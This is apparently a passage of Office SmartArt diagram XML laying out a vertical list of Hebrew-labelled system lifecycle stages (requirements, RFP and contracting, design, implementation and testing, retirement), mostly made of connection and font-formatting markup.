    <dgm:cxn modelId="{3EBF2550-2932-4866-B1CE-9C688F05FD90}" type="presOf" srcId="{1FAC2C12-BB69-4B16-82C9-9193A674BBDA}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{490D5B08-3627-4565-ADC8-EA23CA72BCAB}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{D31DD7FF-2580-430E-9CE3-85368C14CB6A}" srcOrd="1" destOrd="0" parTransId="{85C35E30-23A3-45B1-942F-BF9426DB09F7}" sibTransId="{33A1EF2B-CC45-44CD-B2E9-21167CDD23FC}"/>
    <dgm:cxn modelId="{9859D522-6EA3-4492-A8A6-A7DB36739C53}" type="presOf" srcId="{B794BD9D-2A2A-43F9-A836-2AC112F24E37}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{3CF027BB-F681-4949-A053-9243B9F519C4}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{9DB6222C-B747-44A0-8596-8867E9078A8E}" srcOrd="0" destOrd="0" parTransId="{8CD2EDA5-FA51-456B-8A53-C84293C82FE4}" sibTransId="{C99EFA69-C988-484A-8090-B361D4A2B26E}"/>
    <dgm:cxn modelId="{2F80760B-CAFC-4846-A58F-E09AC74FC5DD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8ED564CC-429C-4822-B46D-A027BD1FE777}" type="presOf" srcId="{ADCC6030-6601-49FF-84FE-F0EBA705DE91}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A2824F38-EB06-4D75-AB4C-378B569F1FFE}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{1FAC2C12-BB69-4B16-82C9-9193A674BBDA}" srcOrd="2" destOrd="0" parTransId="{FF7887AA-C07E-468B-8D1C-EBE0E4FADEAD}" sibTransId="{FAAB9481-62DA-4B10-9C71-AC35FB3DC619}"/>
    <dgm:cxn modelId="{F5956D03-5B29-4E92-96D7-B064884FA691}" type="presOf" srcId="{E72BBCB8-6D71-4357-A070-661ED37CDDEA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{140C4966-92F7-49A7-99BC-38F5A87309CD}" type="presOf" srcId="{D31DD7FF-2580-430E-9CE3-85368C14CB6A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{846B9F3D-0100-664F-9893-070718EA3806}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{114E9BF8-0D0E-47F5-8A0F-2620F7858A5A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{E72BBCB8-6D71-4357-A070-661ED37CDDEA}" srcOrd="2" destOrd="0" parTransId="{2915CDC0-2B93-4927-91A7-DF994F8CB345}" sibTransId="{5D01A1E9-B730-411F-BD3B-14DD42998220}"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{FC47F48B-A8C6-45FA-A45F-68D8935F8994}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{6998A190-A8BB-4E71-8A37-950D580E5161}" srcOrd="0" destOrd="0" parTransId="{23E825C3-859B-4E66-902F-1BEE8B85DD4D}" sibTransId="{BE5F987D-74DF-4689-8D2E-3371DA6D6FF0}"/>
    <dgm:cxn modelId="{A8573C18-6875-40D4-A063-70D9AD0C6393}" type="presOf" srcId="{6998A190-A8BB-4E71-8A37-950D580E5161}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{22CC3741-9DF0-4C76-BF8F-66A9099D18AE}" type="presOf" srcId="{9DB6222C-B747-44A0-8596-8867E9078A8E}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E122AA66-B78A-494B-A522-2DE99DA7BC63}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{20D65441-A843-40C0-93BA-BE668573D30E}" srcOrd="1" destOrd="0" parTransId="{5425BFE1-F309-4EEF-8BA3-047936AD4992}" sibTransId="{CE27E584-D862-41AD-A44F-07845EC1AE43}"/>
    <dgm:cxn modelId="{0ED5000F-6D76-4113-999F-C829F7082E09}" type="presOf" srcId="{7BEDF829-9DBD-4FC0-B5F9-FD7477F5B55E}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{97CB53AE-A046-4E33-B382-77A6C96B2B42}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{60CBAF29-8859-4D9A-A47E-21615E7B99A8}" srcOrd="3" destOrd="0" parTransId="{AA0575EC-42CC-4A33-9403-0D3F7CED113C}" sibTransId="{627F5984-7A74-4EF8-B1EF-1FA345435887}"/>
    <dgm:cxn modelId="{F278D84C-9BFF-4F80-8F7F-ACDADFCE3959}" type="presOf" srcId="{655384AB-6D3C-47AC-B77F-6E015EDEFD4F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D8C0455D-7EA5-4959-A44E-1FF15997BB83}" type="presOf" srcId="{5347AAB2-CA03-4390-B534-F57E3A409681}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{75073D3D-45B2-489E-98C0-1D506F1D3708}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{5347AAB2-CA03-4390-B534-F57E3A409681}" srcOrd="1" destOrd="0" parTransId="{9B4E8A52-55C6-44B5-BC9C-57BE53B6906F}" sibTransId="{1479C321-D68D-4EA1-854C-E17ACA4EE2C4}"/>
    <dgm:cxn modelId="{456A4F48-CC7F-42BC-8BA2-ACC354241412}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7BEDF829-9DBD-4FC0-B5F9-FD7477F5B55E}" srcOrd="2" destOrd="0" parTransId="{583D64A8-6B10-470D-A6AE-095A12B5233B}" sibTransId="{02BD7F49-0B8D-42A2-B035-32D0579B802C}"/>
    <dgm:cxn modelId="{E196842F-A92D-4B71-B99D-08A01EB41D36}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{66AC70C4-7AD9-4A02-8E8E-9E86DB315614}" srcOrd="0" destOrd="0" parTransId="{C530E7A8-2FBF-4B88-8E0C-5FA25BF64DDB}" sibTransId="{91A6A15A-39BE-463B-BE50-61A5DAA31260}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F0F1B160-4BB6-4E1D-9B88-BE7A9C4590DF}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7C5306CB-62DD-439C-9042-9673AE093108}" srcOrd="0" destOrd="0" parTransId="{66E45F54-AC69-4CC8-8143-92CCA66BD6CB}" sibTransId="{E6979349-4CF4-482F-927E-7864339A343F}"/>
    <dgm:cxn modelId="{A25E91C2-5502-49C8-A40B-EEA292EA3537}" type="presOf" srcId="{60CBAF29-8859-4D9A-A47E-21615E7B99A8}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D708F7EB-A8E9-4E44-891E-6C69CC0ACDCF}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{ADCC6030-6601-49FF-84FE-F0EBA705DE91}" srcOrd="3" destOrd="0" parTransId="{83C07B96-C739-4DC0-8568-BD4162DA274A}" sibTransId="{DB4FD935-1E7B-478E-A230-CF4C420A8F3C}"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{71C59095-8F1F-4F0B-85C2-98C255085B57}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{D379F1C2-B8BC-4B70-BF67-538728E7556E}" srcOrd="1" destOrd="0" parTransId="{65B578C9-8FCF-4A94-AB95-F2C605EB9CB1}" sibTransId="{DB006015-E88A-4731-AEE0-50BCB317D74E}"/>
    <dgm:cxn modelId="{7F2BD18E-C576-0B40-8A79-2061FD91A6AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F11C5EAC-E38F-C54D-9134-7BD35514090E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DC5835FE-E6F7-2440-AF28-03961D703AD0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C879C756-7CC5-1C40-99E3-0B4D348381F5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21C92099-A8C0-244E-98EE-3C96FB85D628}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71D2F385-7E2E-3B45-AF74-0F8027D22859}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56948B33-D647-FD4C-A028-B51AE83662FA}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B1D2250-505B-A44D-8224-82EEBBA120ED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{025B9155-C0BA-7049-91B5-A1D32F1DEB0C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1588341-F986-5342-9994-60239EC65C89}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{75076ACA-146B-9E4C-908A-32B2F24505EF}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE472279-B568-0541-AF39-066CEFB488D7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{742FA27F-6C85-1848-A1A5-23A30E3E151A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B83C7B20-BD74-EF4B-9B40-B30B1AE57D02}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45D3D10D-FD08-7746-B350-4A8B85A33536}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4DE2077D-1E41-7641-B88D-5BE8A93F9C50}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5826FA6-000D-004B-92CE-0D501786FEBD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6570E917-5502-744F-90A6-96AEB6E7F264}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A8A8AF2C-ECA9-5B4B-A4FC-6EE47F3FAD86}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
  </dgm:cxnLst>
  <dgm:bg>
    <a:noFill/>
  </dgm:bg>
  <dgm:whole/>
  <dgm:extLst>
    <a:ext uri="http://schemas.microsoft.com/office/drawing/2008/diagram">
      <dsp:dataModelExt xmlns:dsp="http://schemas.microsoft.com/office/drawing/2008/diagram" relId="rId10"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A2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent4_2" csCatId="accent4" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>דרישות וניהול משאבים</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הגדרת דרישות (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>RFP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) והתקשרות חוזית</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>תכנון ועיצוב המערכת</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>גריעת מערכות</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הטמעה, בדיקות ופריסת המערכת</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
